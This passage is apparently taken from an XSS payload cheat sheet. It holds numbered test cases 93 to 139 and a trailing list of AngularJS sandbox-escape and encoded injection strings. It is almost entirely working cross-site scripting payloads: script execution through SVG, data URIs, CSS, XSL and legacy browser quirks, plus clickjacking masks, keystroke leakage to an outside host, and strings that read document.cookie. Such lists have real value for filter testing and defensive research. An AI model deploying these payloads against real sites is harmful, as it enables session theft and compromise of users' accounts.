<div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>

<div id="94"><svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg>//

["'`-->]]>]</div>

<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" 

to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D

%3D"/></feImage></svg>//["'`-->]]>]</div>

<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`--

>]]>]</div>

<div id="97"><!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --

><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>//["'`-->]]>]</div>

<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))

innerHTML=innerHTML</script>//["'`-->]]>]</div>

<div id="99">XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red}   /* all UA */*{background:url(xx:x //**/

\red/*)} /* IE 6-7 Standards mode */</style>//["'`-->]]>]</div>

<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div>

<div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]

</div>

<div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>

<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" 

handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application

%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>//["'`-->]]>]</div>

<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ

%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//

["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>

<div id="108"><!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"><!-- IE 5-9 standards mode 

--><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>

<div id="109"><svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect  fill="white" style="clip-

path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>//["'`-->]]>]</div>

<div id="110"><svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>//["'`-->]]>]</div>

<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>

<div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>

<div id="113"><div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div>

<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>

<div id="115"><!--[if]><script>alert(115)</script --><!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div>

<div id="116"><div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" 

targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>

<div id="117"><a href="http://attacker.org"><iframe src="http://example.org/"></iframe></a>//["'`-->]]>]</div>

<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div><iframe 

src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>

<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" 

rows="10"></textarea>//["'`-->]]>]</div>

<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script><body><a href="#" 

onclick="makePopups()">Spam</a>//["'`-->]]>]</div>

<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe 

src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" 

maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" 

cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>//["'`-->]]>]</div>

<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>

<div id="123"><span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-

1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert

('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div>

<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`--

>]]>]</div>

<div id="125"><?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id    ID    #REQUIRED>]

><svg xmlns="http://www.w3.org/2000/svg"><xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template 

match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe></xsl:template></xsl:stylesheet><circle fill="red" 

r="40"></circle></svg>//["'`-->]]>]</div>


<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" 

onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>

<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" 

observer="x"/><handler id="y">alert(127)</handler></svg>//["'`-->]]>]</div>

<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>

<div id="129"><svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)

</script></svg>")'><!--Same effect with<image filter='...'>--></svg>//["'`-->]]>]</div>

<div id="130"><math href="javascript:alert(130)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" 

xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert

(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>//["'`-->]]>]</div>

<div id="131"><b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host 

Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page 

Cookies:'+document.cookie);//<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: 

'+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page 

Cookies:'+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" 

ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>

<div id="132"><!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" 

type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" 

begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" 

begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>//["'`-->]]>]</div>

<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>

<div id="134"><xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(134)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}

</style>-->{}*{color:red}</style>//["'`-->]]>]</div>

<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject

(&apos;htmlfile&apos;).parentWindow.alert(135)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>//["'`--

>]]>]</div>

<div id="136"><form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input 

name="injected" value="injected" dirname="password" /><input type="submit"></form>//["'`-->]]>]</div>

<div id="137"><svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" 

from="javascript:alert(137)" to="&" /></a>//["'`-->]]>]</div>

<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div>

<div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined

"><script/src=//ajax.googleapis.com/ajax/libs/angularjs/1.1.5/angular.js></script><h1/ng-click=$event.view.alert(1)//><CLICKME"
"ng-click="$event.view.alert(1)".
{{ toString.constructor.prototype.toString=toString.Constructor.prototype.call;["a","alert(1)"].sort(toString.constructor) }}
(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor( _.__proto__,$).value,0,'alert(1)')() }}
{{ constructor.constructor('alert(1)'() }}
%27|[window[%27location%27]%3D%27\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27
\u003Cimg src=x onerror=alert(1)\u003E
%D0%B4%D0%B0%D1%82%D0%BE%D1%82%D0%B5%D0%BA%D0%B0
/%D0%B4%D0%B0%D1%82%D0%BE%D1%82%D0%B5%D0%BA%D0%B0
feed:http//www.google.com:javascript:alert(1);/
feed:javascript:alert(1);
";returnValue=document.cookie//
";returnValue=localStorage.key//
%22%3B~{toString:opener.button.click}//
%22%3B~{valueOf:opener.button.click}//
%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
%3Cx~%0Aonmouseover=alert(1)%3EAAA
%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
%3Cx~%0Aonmouseover=alert(1)%3EAAA
